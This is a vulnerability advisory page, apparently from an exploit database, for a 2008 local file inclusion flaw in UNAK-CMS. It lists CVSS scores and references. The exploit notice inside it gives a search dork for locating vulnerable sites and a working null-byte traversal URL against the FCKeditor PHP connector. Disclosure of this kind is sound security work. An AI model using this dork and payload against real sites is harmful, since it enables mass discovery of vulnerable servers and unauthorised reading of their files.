UNAK-CMS Lfi

2008.08.05

Credit: r3d.w0rm_at_yahoo.com

Risk: High

Local: No

Remote: Yes

CVE: CVE-2008-3568

CWE: CWE-22

CVSS Base Score: 7.5/10

Impact Subscore: 6.4/10

Exploitability Subscore: 10/10

Exploit range: Remote

Attack complexity: Low

Authentication: No required

Confidentiality impact: Partial

Integrity impact: Partial

Availability impact: Partial

 #####################################################################################
# UNAK-CMS Lfi
#####################################################################################
#
#AUTHOR : IRCRASH (R3d.W0rm (Sina Yazdanmehr))
#Discovered by : IRCRASH (R3d.W0rm (Sina Yazdanmehr))
#Our Site : http://IRCRASH.COM
#IRCRASH Team Members : Dr.Crash - R3d.w0rm (Sina Yazdanmehr)
#####################################################################################
#
#Script Download : www.unak.net
#
#DORK : "Powered by UNAK-CMS"
#
#####################################################################################
# [Lfi]
#
#http://Site/fckeditor/editor/filemanager/browser/default/connectors/php/connector.php?Dirroot=/file.type%00
#
#####################################################################################
# Site : http://IRCRASH.COM
###################################### TNX GOD ######################################

References:

http://www.securityfocus.com/bid/30533

http://www.securityfocus.com/archive/1/archive/1/495090/100/0/threaded

See this note in RAW Version

Vote for this issue:

50%

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

(*) - required fields.

{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1

{{ x.comment }}

UNAK-CMS Lfi

References:

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.